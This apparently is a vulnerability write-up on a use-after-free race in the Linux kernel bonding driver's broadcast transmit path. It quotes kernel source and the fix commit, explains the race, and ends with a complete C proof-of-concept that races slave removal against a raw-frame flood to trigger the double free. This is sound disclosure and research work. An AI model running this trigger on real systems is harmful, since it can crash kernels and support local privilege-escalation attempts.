Introduction
Linux offers a way to synchronize multiple network interfaces, physical or virtual, and make them run a single logical NIC. The bonding driver handles of all that work. It is present in all major distros and this bug is exploitable in the ones that allow usernamespaces for unprivileged users like in RedHat or Fedora; that is, it’s reachable from any code path that can send packets out of the bonding device.
How does this work ?
The idea is to have one “Master” Interface and multiple other “Slave” interfaces that will be attached to the master; this can be achieved in many ways as documented in docs.kernel.org One of them ways is:
Step I: Loading the bonding driver + dummy for slave interfaces
system("modprobe dummy 2>/dev/null || true");
system("modprobe bonding 2>/dev/null || true");
Step II: Creating interfaces
system("ip link add " NIC_SLAVE0 " type dummy 2>/dev/null");
system("ip link add " NIC_SLAVE1 " type dummy 2>/dev/null");
system("ip link add " NIC_SLAVE2 " type dummy 2>/dev/null");
system("ip link add " NIC_SLAVE3 " type dummy 2>/dev/null");
// ...
system("ip link add " BOND_DEV " type bond 2>/dev/null");
Step III: Creating the bonding + adding slaves
printf("[*] Configuring bond (mode=broadcast)...\n");
run("ip link set " BOND_DEV " type bond mode broadcast"); // [1] <-------
printf("[*] Enslaving permanent slaves...\n");
system("ip link set " NIC_SLAVE0 " master " BOND_DEV);
system("ip link set " NIC_SLAVE1 " master " BOND_DEV);
system("ip link set " NIC_SLAVE2 " master " BOND_DEV);
system("ip link set " NIC_SLAVE3 " master " BOND_DEV);
// ...
Step IV: Bringing them up
system("ip link set " BOND_DEV " up");
system("ip link set " NIC_SLAVE0 " up");
system("ip link set " NIC_SLAVE1 " up");
system("ip link set " NIC_SLAVE2 " up");
system("ip link set " NIC_SLAVE3 " up");
So, here we have 1 Master which is BOND_DEV and 4 Slaves NIC_SLAVE{0,1,2,3}.
Bonding Modes
At [1] (Step III), i set up the bond to be in broadcast mode. Why ? First off, when creating a bond, there are as you would imagine many parameters like:
- max_bonds: which specifies the maximum number of bondings per driver.
- packets_per_slave: specifies number of packets to transmit through a slave before moving to the next one (effective in load-balance style mode).
- and many more relative to a mode.
Mode is another parameter that determines the behaviour of the bonding, and there are 7 of them; the default one is balance-rr, or balance-round-robin, which transmits packets in sequential order from the first available slave through the last and provides load balancing. Others are: active-backup, balance-xor, broadcast, 802.3ad, balance-tlb & balance-alb. The broadcast mode as its name suggest, sends all the packet through all of slave interfaces.
The Broadcast Transmit Path
Let’s dive into it’s implementation:
Upon sending sockets through the bonding, bond_start_xmit() [1] is called:
// drivers/net/bonding/bond_main.c
static const struct net_device_ops bond_netdev_ops = {
.ndo_init = bond_init,
.ndo_uninit = bond_uninit,
.ndo_open = bond_open,
.ndo_stop = bond_close,
.ndo_start_xmit = bond_start_xmit, // [2]
// [...]
.ndo_add_slave = bond_enslave,
.ndo_del_slave = bond_release,
.ndo_fix_features = bond_fix_features,
// [...]
};
This function then filters out the mode:
static netdev_tx_t __bond_start_xmit(struct sk_buff *skb, struct net_device *dev)
{
struct bonding *bond = netdev_priv(dev);
if (bond_should_override_tx_queue(bond) &&
!bond_slave_override(bond, skb))
return NETDEV_TX_OK;
// [...]
switch (BOND_MODE(bond)) { // <------------
case BOND_MODE_ROUNDROBIN:
return bond_xmit_roundrobin(skb, dev);
case BOND_MODE_ACTIVEBACKUP:
return bond_xmit_activebackup(skb, dev);
case BOND_MODE_8023AD:
if (bond_should_broadcast_neighbor(skb, dev))
return bond_xmit_broadcast(skb, dev, false);
fallthrough;
case BOND_MODE_XOR:
return bond_3ad_xor_xmit(skb, dev);
case BOND_MODE_BROADCAST: // [3]
return bond_xmit_broadcast(skb, dev, true);
// [...]
At [3], it calls bond_xmit_broadcast() for the broadcasting mode BOND_MODE_BROADCAST:
// drivers/net/bonding/bond_main.c
/* in broadcast mode, we send everything to all or usable slave interfaces.
* under rcu_read_lock when this function is called.
*/
static netdev_tx_t bond_xmit_broadcast(struct sk_buff *skb,
struct net_device *bond_dev,
bool all_slaves)
{
struct bonding *bond = netdev_priv(bond_dev);
struct bond_up_slave *slaves;
bool xmit_suc = false;
bool skb_used = false;
int slaves_count, i;
if (all_slaves)
slaves = rcu_dereference(bond->all_slaves);
else
slaves = rcu_dereference(bond->usable_slaves);
slaves_count = slaves ? READ_ONCE(slaves->count) : 0;
for (i = 0; i < slaves_count; i++) {
struct slave *slave = slaves->arr[i]; // [4]
struct sk_buff *skb2;
if (!(bond_slave_is_up(slave) && slave->link == BOND_LINK_UP))
continue;
if (bond_is_last_slave(bond, slave)) {
skb2 = skb;
skb_used = true;
} else {
skb2 = skb_clone(skb, GFP_ATOMIC);
if (!skb2) {
net_err_ratelimited("%s: Error: %s: skb_clone() failed\n",
bond_dev->name, __func__);
continue;
}
}
if (bond_dev_queue_xmit(bond, skb2, slave->dev) == NETDEV_TX_OK)
xmit_suc = true;
}
The implementation has an optimization: instead of cloning the skb for every slave, it sends the original skb on the last slave and clones for everyone else; the idea being: use the clone skb for the first ones, and then use the real one for last so that it gets consumed/freed upon it(As you may know, each clone increases the refcount of the skb).
The Bug
In the original commit:Bug: net: bonding: fix use-after-free in bond_xmit_broadcast() :
In the Linux kernel, the following vulnerability has been resolved:
net: bonding: fix use-after-free in bond_xmit_broadcast()
bond_xmit_broadcast() reuses the original skb for the last slave
(determined by bond_is_last_slave()) and clones it for others.
Concurrent slave enslave/release can mutate the slave list during
RCU-protected iteration, changing which slave is "last" mid-loop.
This causes the original skb to be double-consumed (double-freed).
Replace the racy bond_is_last_slave() check with a simple index
comparison (i + 1 == slaves_count) against the pre-snapshot slave
count taken via READ_ONCE() before the loop. This preserves the
zero-copy optimization for the last slave while making the "last"
Root Cause
There are two data structures involved here, and that’s where the trouble starts:
slaves->arr[]in [4]: an array snapshot of slaves, taken under RCU. The xmit path iterates this array.bond->dev->adj_list.lower— a live linked list of “lower” devices.bond_is_last_slave()reads its tail to decide who is “last.”
These two structures are supposed to describe the same set of slaves. Most of the time they do. The bug is that they are not updated atomically with respect to each other.
The Race
Upon deleting a slave:
.ndo_del_slave = bond_release,
bond_release() is called:
// drivers/net/bonding/bond_main.c
/* A wrapper used because of ndo_del_link */
int bond_release(struct net_device *bond_dev, struct net_device *slave_dev)
{
return __bond_release_one(bond_dev, slave_dev, false, false);
}
bond_upper_dev_unlink()— callslist_del_rcu()on the adj_list entry. The liveadj_list.lowerno longer contains the removed slave.bond_update_slave_arr()— allocates a new array, walks the slaves, builds a new snapshot. This may sleep (kzalloc).rcu_assign_pointer(bond->all_slaves, new_arr)— only now does the snapshot the xmit path sees actually change.
Between step 1 and step 3 there is a window — small, but real, and stretched out further by the allocation in step 2. During that window, if a transmit runs:
slaves->arrstill contains the old snapshot. Say[P0, P1, P2, P3, P4, P5(RC)], whereRCis the slave being removed.bond_last_slave(bond)reads the live adj_list, sees thatRCis gone, and returnsP4as the tail.
i=P0: bond_is_last_slave(P0)? no → skb_clone()
i=P1: bond_is_last_slave(P1)? no → skb_clone()
i=P2: bond_is_last_slave(P2)? no → skb_clone()
i=P3: bond_is_last_slave(P3)? no → skb_clone()
i=P4: bond_is_last_slave(P4)? YES → use original skb // skb consumed here
i=P5: bond_is_last_slave(P5)? no → skb_clone(<freed skb>) // UAF

The original skb gets consumed by P4 because the live list returns P4 as the tail; But the loop continues on RC, and on that iteration we reach back into the skb that just got freed and try to clone it. KASAN screams.

Full PoC
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>
#include <errno.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <net/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <arpa/inet.h>
#define BOND_DEV "bond_uaf"
#define PERM_SLAVE0 "dummy_p0"
#define PERM_SLAVE1 "dummy_p1"
#define PERM_SLAVE2 "dummy_p2"
#define PERM_SLAVE3 "dummy_p3"
/* RC is added LAST so it sits at adj_list tail — it is the removal target. */
#define RACE_SLAVE "dummy_rc"
#define SYSFS_SLAVES "/sys/class/net/" BOND_DEV "/bonding/slaves"
#define TEST_DURATION_S 30
/* ----------------------------------------------------------------- globals */
static volatile int g_stop = 0;
static unsigned long g_pkts = 0;
static unsigned long g_races = 0;
/* ------------------------------------------------------------------ helpers */
static void run(const char *cmd)
{
int r = system(cmd);
if (r != 0)
fprintf(stderr, " [!] '%s' exited %d\n", cmd, r);
}
/* Write to sysfs bonding/slaves file; returns 0 on success. */
static int sysfs_slave_write(const char *entry)
{
int fd = open(SYSFS_SLAVES, O_WRONLY);
if (fd < 0)
return -1;
ssize_t n = write(fd, entry, strlen(entry));
close(fd);
return (n > 0) ? 0 : -1;
}
/* ------------------------------------------------------------------- setup */
static void setup_interfaces(void)
{
printf("[*] Loading modules (dummy, bonding)...\n");
system("modprobe dummy 2>/dev/null || true");
system("modprobe bonding 2>/dev/null || true");
printf("[*] Creating interfaces...\n");
run("ip link add " PERM_SLAVE0 " type dummy 2>/dev/null");
run("ip link add " PERM_SLAVE1 " type dummy 2>/dev/null");
run("ip link add " PERM_SLAVE2 " type dummy 2>/dev/null");
run("ip link add " PERM_SLAVE3 " type dummy 2>/dev/null");
run("ip link add " RACE_SLAVE " type dummy 2>/dev/null");
run("ip link add " BOND_DEV " type bond 2>/dev/null");
printf("[*] Configuring bond (mode=broadcast)...\n");
run("ip link set " BOND_DEV " type bond mode broadcast");
/* Add permanent slaves first so they sit at the front of adj_list. */
printf("[*] Enslaving permanent slaves...\n");
run("ip link set " PERM_SLAVE0 " master " BOND_DEV);
run("ip link set " PERM_SLAVE1 " master " BOND_DEV);
run("ip link set " PERM_SLAVE2 " master " BOND_DEV);
run("ip link set " PERM_SLAVE3 " master " BOND_DEV);
/* Add RACE_SLAVE last → it becomes adj_list tail → bond_last_slave(). */
printf("[*] Enslaving race slave (will be tail of adj_list)...\n");
run("ip link set " RACE_SLAVE " master " BOND_DEV);
printf("[*] Bringing interfaces up...\n");
run("ip link set " BOND_DEV " up");
run("ip link set " PERM_SLAVE0 " up");
run("ip link set " PERM_SLAVE1 " up");
run("ip link set " PERM_SLAVE2 " up");
run("ip link set " PERM_SLAVE3 " up");
run("ip link set " RACE_SLAVE " up");
}
static void teardown_interfaces(void)
{
printf("\n[*] Tearing down interfaces...\n");
/* Ensure race slave is released before deleting. */
sysfs_slave_write("-" RACE_SLAVE);
system("ip link del " BOND_DEV " 2>/dev/null || true");
system("ip link del " PERM_SLAVE0 " 2>/dev/null || true");
system("ip link del " PERM_SLAVE1 " 2>/dev/null || true");
system("ip link del " PERM_SLAVE2 " 2>/dev/null || true");
system("ip link del " PERM_SLAVE3 " 2>/dev/null || true");
system("ip link del " RACE_SLAVE " 2>/dev/null || true");
}
static void sigint_handler(int sig) { (void)sig; g_stop = 1; }
/*
* Floods the bond with broadcast Ethernet frames. Each sendto() call reaches
* bond_start_xmit() → bond_xmit_broadcast().
*/
static void *thread_send(void *arg)
{
(void)arg;
int sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (sock < 0) {
perror("[-] socket(AF_PACKET)");
return NULL;
}
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, BOND_DEV, IFNAMSIZ - 1);
if (ioctl(sock, SIOCGIFINDEX, &ifr) < 0) {
perror("[-] SIOCGIFINDEX");
close(sock);
return NULL;
}
/*
* Minimal valid-looking Ethernet frame. Destination is ff:ff:ff:ff:ff:ff
* so the bonding broadcast path is exercised for every send.
*/
uint8_t frame[64];
memset(frame, 0, sizeof(frame));
memset(frame + 0, 0xff, 6); /* dst: broadcast */
frame[6] = 0xde; frame[7] = 0xad; /* src MAC */
frame[8] = 0xbe; frame[9] = 0xef;
frame[10] = 0x13; frame[11] = 0x37;
frame[12] = 0x08; frame[13] = 0x00; /* EtherType: IPv4 */
memset(frame + 14, 0x41, sizeof(frame) - 14); /* payload filler */
struct sockaddr_ll sll = {
.sll_family = AF_PACKET,
.sll_protocol = htons(ETH_P_ALL),
.sll_ifindex = ifr.ifr_ifindex,
.sll_halen = ETH_ALEN,
};
memset(sll.sll_addr, 0xff, ETH_ALEN);
while (!g_stop) {
sendto(sock, frame, sizeof(frame), 0,
(struct sockaddr *)&sll, sizeof(sll));
g_pkts++;
}
close(sock);
return NULL;
}
/* ------------------------------------------------------- Thread: race slave */
static void *thread_race(void *arg)
{
(void)arg;
while (!g_stop) {
sysfs_slave_write("-" RACE_SLAVE);
sysfs_slave_write("+" RACE_SLAVE);
g_races++;
}
sysfs_slave_write("-" RACE_SLAVE);
return NULL;
}
/* ---------------------------------------------------------------------- main */
int main(void)
{
signal(SIGINT, sigint_handler);
signal(SIGTERM, sigint_handler);
setup_interfaces();
pthread_t t_send, t_race0, t_race1;
pthread_create(&t_send, NULL, thread_send, NULL);
pthread_create(&t_race0, NULL, thread_race, NULL);
pthread_create(&t_race1, NULL, thread_race, NULL);
for (int elapsed = 0; elapsed < TEST_DURATION_S && !g_stop; elapsed++) {
sleep(1);
printf("\r[*] t=%2ds | pkts: %-12lu | race iters: %-10lu",
elapsed + 1, g_pkts, g_races);
fflush(stdout);
}
g_stop = 1;
printf("\n");
pthread_join(t_send, NULL);
pthread_join(t_race0, NULL);
pthread_join(t_race1, NULL);
teardown_interfaces();
return 0;
}